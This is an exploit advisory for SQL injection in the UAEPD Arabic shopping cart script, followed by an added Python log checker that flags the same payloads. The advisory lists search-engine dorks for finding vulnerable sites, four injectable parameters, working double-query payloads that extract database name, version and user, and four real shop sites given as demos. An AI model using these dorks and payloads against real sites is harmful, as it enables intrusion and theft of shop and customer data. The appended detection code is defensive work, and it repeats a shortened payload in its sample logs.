UAEPD Shopping Cart Script SQL Injection Vulnerability
####################################################################
[~] Script : http://www.uaepd.net/
[~] Dork :
[1] inurl:”products.php?cat_id=” “Powered by: PD ”
[2] inurl:”products.php?p_id” “Powered by: PD ”
[3] inurl:”page.php?id=” “Powered by: PD ”
[4] inurl:”news.php?id=” “Powered by: PD ”
####################################################################
[~] INTRODUCTION [~]
UAEPD Script is an Arabic shopping cart script with many features.
[~] DESCRIPTION [~]
# Control panel available in Arabic or English.
# Storefront viewable by visitors in Arabic and English.
# Possibility to choose one language or operating languages.
# The ability to add unlimited number of pages.
# Format property provides all store pages.
# Add YouTube links and images in all the pages of the store.
# The ability to add sections of main and sub.
# Add an unlimited number of products.
# Add multiple images of the products.
# Availability of property sizes and colors for each product.
# Print logo on the product images automatically.
# Availability of property with a shipping price for each region.
# Shopping cart system for buying products.
# You can ask system of members with or without system.
# Three ways to pay:(bank transfer-Receipt & received-Paypal).
# Send an e-mail automatically to any purchase or booking.
# Provide a search feature in the products.
# Availability of the currencies of the property.
# Comprehensive statistics for the purchases and reservations.
# Guestbook available partition.
# Provide property advertising space multiple places.
# Property provides the tape device.
# Offers the possibility to close or open the store.
[~] BUG TYPE [~]
SQL injection (command double query)
[~] BUG [~]
[#] site/products.php?cat_id=[sql injection]
[#] site/products.php?p_id=[sql injection]
[#] site/page.php?id=[sql injection]
[#] site/news.php?id=[sql injection]
[~] EXPLOIT [~]
TO EXTRACT DATABASE NAME, VERSION & USER:
[#] site/products.php?cat_id=99999+and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
[#] site/products.php?p_id=99999+and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
[#] site/page.php?id=99999+and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
[#] site/news.php?id=99999+and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
[~] DEMOS [~]
[#] http://sedenshop.com/products.php?p_id=3
[#] http://www.henna.ae/products.php?cat_id=1
[#] http://www.shah-een.com/news.php?id=1
[#] http://www.nourita.com/products.php?cat_id=4
./McS
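Added example, not part of the original advisory or the UAEPD code: a Python log check for the four endpoints listed under BUG. It flags requests whose id parameter is not a plain integer and labels those carrying the double-query tokens seen under EXPLOIT. The combined log format, the SAMPLE_LOG lines and the names classify and scan are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script names and id parameters taken from the advisory's BUG section.
WATCHED = {"products.php": {"cat_id", "p_id"}, "page.php": {"id"}, "news.php": {"id"}}
# Tokens characteristic of the double-query (duplicate-key error) payload shape.
SIGNATURE = re.compile(r"information_schema|floor\s*\(\s*rand\s*\(|group\s+by", re.I)
# Client address and request target from an Apache/nginx "combined" log line (assumed format).
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return (ip, script, param, verdict) for each watched id that is not a plain integer."""
    m = REQUEST.match(log_line)
    if not m:
        return []
    ip, target = m.groups()
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()  # tolerate installs in a subdirectory
    findings = []
    # parse_qsl percent-decodes values and turns '+' into a space before we inspect them.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in WATCHED.get(script, ()) and not re.fullmatch(r"[0-9]{1,10}", value):
            verdict = "double-query-sqli" if SIGNATURE.search(value) else "non-integer-id"
            findings.append((ip, script, name, verdict))
    return findings

def scan(lines):
    """Flatten the findings for an iterable of log lines."""
    return [f for line in lines for f in classify(line)]

# Constructed sample log lines (documentation address range, shortened payload).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2012:10:01:22 +0000] "GET /products.php?cat_id=4 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Mar/2012:10:01:25 +0000] "GET /shop/news.php?id=99999+and+(select+1+from+'
    '(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)'
    '+and+1=1 HTTP/1.1" 200 312 "-" "-"',
    '203.0.113.9 - - [12/Mar/2012:10:01:31 +0000] "GET /page.php?id=7%27 HTTP/1.1" 200 298 "-" "-"',
    '203.0.113.7 - - [12/Mar/2012:10:02:02 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Only the query string is inspected, so ids sent in a POST body are not covered by this check.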